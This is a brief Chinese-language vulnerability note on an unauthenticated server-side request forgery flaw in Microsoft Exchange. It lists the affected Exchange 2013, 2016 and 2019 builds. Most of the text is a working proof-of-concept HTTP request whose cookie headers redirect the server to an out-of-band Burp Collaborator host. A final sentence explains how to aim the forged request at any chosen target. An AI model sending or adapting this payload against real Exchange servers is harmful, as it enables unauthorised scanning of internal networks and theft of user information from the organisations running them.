Exchange SSRF 漏洞,攻击者可直接构造恶意请求,以 Exchange server 的身份发起任意 HTTP 请求,扫描内网,并且可获取 Exchange 用户信息。该漏洞利用无需身份认证。
影响版本
Exchange 2013 Versions < 15.00.1497.012,
Exchange 2016 CU18 < 15.01.2106.013,
Exchange 2016 CU19 < 15.01.2176.009,
Exchange 2019 CU7 < 15.02.0721.013,
Exchange 2019 CU8 < 15.02.0792.010。
poc
GET /owa/auth/x.js HTTP/1.1
Host: IP
Connection: close
sec-ch-ua: ";Not A Brand";v="99", "Chromium";v="88"
sec-ch-ua-mobile: ?0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-Dest: document
Referer: https://IP/owa/auth/logon.aspx?url=https%3a%2f%2PIp%2fowa%2f&reason=0
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: X-AnonResource=true; X-AnonResource-Backend=oyq5v1vyqo5komisdc1jfltvzm5dt2.burpcollaborator.net/ecp/default.flt?~3; X-BEResource=localhost/owa/auth/logon.aspx?~3;x.js 可以随意构造,在 cookie 的 X-AnonResource-Backend 参数中设置 ssrf 目标,比 如上面的 oyq5v1vyqo5komisdc1jfltvzm5dt2.burpcollaborator.net